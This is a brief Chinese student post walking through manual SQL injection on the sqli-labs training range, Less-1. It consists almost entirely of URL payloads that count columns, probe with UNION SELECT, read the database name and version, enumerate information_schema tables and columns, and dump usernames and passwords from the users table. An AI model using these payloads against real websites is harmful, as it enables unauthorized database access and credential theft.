【学员分享】基于sql注入的sqli-lab靶场的手工注入

http://www.f.com/sqli-labs-master/Less-1/?id=1' or 1=2 order by 3 %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3 %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),version() %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(*),2 from information_schema.TABLES where TABLE_SCHEMA='security'

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,count(COLUMN_NAME),2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' %23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 1,1%23

http://www.f.com/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,concat(username,'---',password),2 from users %23